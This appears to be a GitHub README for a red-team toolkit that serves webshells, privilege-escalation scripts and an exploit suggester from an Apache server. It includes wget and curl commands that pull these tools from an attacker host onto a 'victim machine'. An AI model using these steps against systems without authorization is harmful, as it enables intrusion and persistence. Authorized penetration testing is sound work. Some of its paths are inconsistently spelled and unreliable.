
The redteam-apache-toolkit is a repository of useful tools for redteam operators intended to be served by an Apache webserver for easy transfer to target machines.

Primary LanguagePowerShell


An apache2 webserver toolkit to enable tool downloads from attacker to target machine via http


To use, the redteam-apache-tookit needs to be located inside /var/www/html. There are two options to do this.

  1. Navigate inside /var/www/html, then use
git clone https://github.com/tcbutler320/redteam-apache-toolkit.git  
  1. Clone the repoistory to a location of your choosing, then use
cp -r redteam-apache-toolkit /var/www/html


The toolkit includes many tools that come with the latest Kali Linux Distribution as well as some custom tools from the community. See the credits section for details.

Category Description Path
Webshells A collection of webhells broken down by language /redteam-apache-toolkit/webshells
priv-escalation Privelege escalation scripts for windows and unix /redtean-apache-toolkit/priv-escalation
Exploit Suggester A custom exploit suggester script from the pentestmonkeys /redteam-apache2-toolkit/exploit-suggester


  1. Start the apache2 webserver
service apache2 start
  1. Choose the tool you want to transfer to the victim machine
  2. Choose a method of http transfer
Method Command
wget --recursive --no-parent wget --recursive --no-parent http://[host-ip]/redteam-apache2-toolkit
wget wget http://[host-ip]/redteam-apache2-toolkit/[tool category]/[tool name]
curl curl -o [name the file] http://[host-ip]/redteam-apache2-toolkit/[tool category]/[tool name]


Thanks to the following for great open source tools included in this kit.

  1. Pentestmonkey